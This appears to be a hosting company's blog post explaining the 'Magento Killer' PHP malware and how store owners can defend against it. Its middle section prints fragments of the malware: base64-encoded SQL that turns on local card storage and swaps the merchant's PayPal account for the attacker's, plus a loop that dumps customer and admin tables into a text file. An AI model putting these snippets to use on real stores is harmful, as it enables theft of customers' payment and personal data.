Magento Killer: A New Security Threat to Magento Stores

In this article, you’ll learn everything you need to know about Magento Killer.

What it is.

How it affects your Magento store. 

(And most important of all) how to secure your e-commerce store form it.

Let’s dive right in.

What is Magento Killer?

Magento Killer is a malicious PHP script that hackers are using to modify the core_config_data table to steal customer’s payment information from Magento database. It mainly uses 2 objects- Update DB (Savecc) and Update PP (MailPP).

Securing your e-commerce store has become crucial more than ever now. It is the responsibility of every Magento store owner to protect the personal and payment data of their customers. The user considers platform security as a vital trust factor that may directly impact the choice of a specific online store.

The United States and India Rank No.1 for targeted attacks

If you own an e-commerce store in India or the US, then there is some shocking news for you. The US is the No. 1 target for targeted attacks followed by India. Here is the breakdown of the top 10 countries that are impacted most by these kinds of attacks:-

Source: Norton

Magento powers more than 250,000 websites all over the world. Hence it should not come as a surprise that it is often the target of cybercriminals or hackers.

They are always looking for loopholes in your Magento store configuration so that they can gain access to confidential data.

How $ConfKiller Works?

$ConfKiller or Magento killer performs malicious operations to steal the payment information of the customers. 

The first step is an attack on special SQL queries encoded in base64

This may appear like this:-

$ConfKiller = array( 
         'Update DB (Savecc)' =>
base64_decode('VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQNCmBzY29wZWAgPSAnZGVmYXVsdCcsDQpgc2NvcGVfaWRgID0gJzAnLA0KYHBhdGhgID0gJ3BheW1lbnQvY2NzYXZlL2FjdGl2ZScsDQpgdmFsdWVgID0gJzEnDQpXSEVSRSBgcGF0aGAgPSAncGF5bWVudC9jY3NhdmUvYWN0aXZlJzs='),
//UPDATE `core_config_data` SET `scope` = 'default', `scope_id` = '0', `path` = 'payment/ccsave/active', `value` = '1' WHERE `path` = 'payment/ccsave/active';
         'Update PP (MailPP)' =>
base64_decode('VVBEQVRFIGBjb3JlX2NvbmZpZ19kYXRhYCBTRVQKYHNjb3BlYCA9ICdkZWZhdWx0JywKYHNjb3BlX2lkYCA9ICcwJywKYHBhdGhgID0gJ3BheXBhbC9nZW5lcmFsL2J1c2luZXNzX2FjY291bnQnLApgdmFsdWVgID0gJ1tyZWRhY3RlZF1AZ21haWwuY29tJwpXSEVSRSBgcGF0aGAgPSAncGF5cGFsL2dlbmVyYWwvYnVzaW5lc3NfYWNjb3VudCc7')
//UPDATE `core_config_data` SET `scope` = 'default', `scope_id` = '0', `path` = 'paypal/general/business_account', `value` = '[redacted]@gmail.com' WHERE `path` = 'paypal/general/business_account';

There are mainly 2 objects within the $ConfKiller array that is responsible for the infection. These 2 enable the hackers to steal the info easily and transfer it to any location they want. 

1. Update DB (Savecc): It configures the Magento store in such a way that instead of sending the credit card information to the authorized payment processor, it saves the payment data on the server. 
2. Update PP (MailPP): This replaces the PayPal account of merchant linked to the website with the hacker’s account. 

To protect customer’s data, Magento encrypts the locally saved payment details but this also fails if your site is attacked with Magento Killer.

The attacker can access ./app/etc/local.xml file of Magento containing the encryption key using this malicious script. Once the key is obtained, they decrypt the payment information into plaintext to use it further for fraudulent transactions or sell it to anyone else.

The second step is to steal data from Magento databases

But stealing the credit card number is not enough to make corrupt transactions, the hacker must have customer’s personal information. It may include the correct name, email address and permanent address.

1. To steal this additional data, they run another script used in their SQL queries from the injected database of Magento.

    $query = array(
'admin_user'                        => 'SELECT * FROM admin_user' ,
'aw_blog_comment'                   => 'SELECT * FROM aw_blog_comment' ,
'core_email_queue_recipients'       => 'SELECT * FROM core_email_queue_recipients' ,
'customer_entity'                   => 'SELECT * FROM customer_entity' ,

2. It extracts any customer information stored in the Magento database tables.

3. It then trims this data, keeping only the information required for fraudulent purchases. Finally, it generates a *-shcMail.txt file in the directory containing the relevant customer information.

$namefile = md5(time())."-shcMail.txt";
foreach ($query as $shc_key => $shc_query) {
$hasil = mysql_query($shc_query);
    while ( $kolom_db = mysql_fetch_assoc($hasil) ) {
        $mail[] = $kolom_db[$shcolom[$shc_key]];
        $myfile = fopen($namefile, "a+") or die("Unable to open file!");
        fwrite($myfile, $kolom_db[$shcolom[$shc_key]]."rn");
        fclose($myfile);

How to secure your e-commerce store from Magento Killer?

1. Stay up to date

Always stay on the top level of security by using the latest version of Magento. If you’re still using the outdated versions, you’re compromising on your website’s security and putting your customers’ data on the stake.

2. Use WAF

WAF, an acronym for Web Application Firewall offers an extended layer of security for your Magento shop. As cyber criminals such as hackers and fraudsters use your forms’ fields and data to inject a MySQL statement.

Go through our Magento Security Guide to secure your store.

3. Enable Two-step Authentication

The two-step authentication is a feature that enhances your eCommerce security by preventing any intruder access to your website.

When you enable two-factor authentication, you’re required to have more than just the usual login details. Means apart from your username and password to log in to your account, you would need another piece of information. For instance, a one-time code.

If you still have Magento Security issues, then our Magento Experts are here to help you. ServerGuy offers fully secure Magento hosting services so that your site remains protected from such attacks.

You can also leave a comment below and we will definitely get back to you.